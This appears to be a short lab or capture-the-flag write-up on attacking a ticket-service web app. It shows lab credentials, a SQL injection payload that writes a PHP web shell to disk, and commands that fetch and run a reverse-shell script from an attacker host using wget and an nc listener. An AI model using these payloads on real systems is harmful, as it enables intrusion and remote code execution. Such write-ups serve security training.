17445
Seems to be a ticket service.
Registering and creating a new user and logging in as issue_user : ManagementInsideOld797

Now checking the parameter in the code:
It is vulnerable for SQL injection
We can head to that url: 
Interrupting the page in burpsuite:
We can change add the priority parameter:
We have a 400 bad request error.
But trying with POST request:
It's successful.
Now we can write the webshell to the path discovered from port [[30455]]
' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/webshell.php' -- -
Now navigating to http://192.168.155.147:30455/webshell.php?cmd=id 
To get a reverse shell:
Start a python server:
python3 -m http.server 30455Setup a listener:
sudo rlwrap nc -nlvp 443Then:
http://192.168.155.147:30455/shell.php?cmd=wget http://192.168.45.182/shell.shhttp://192.168.155.147:30455/shell.php?cmd=bash%20shell.shWe get a shell: 
Last updated
Was this helpful?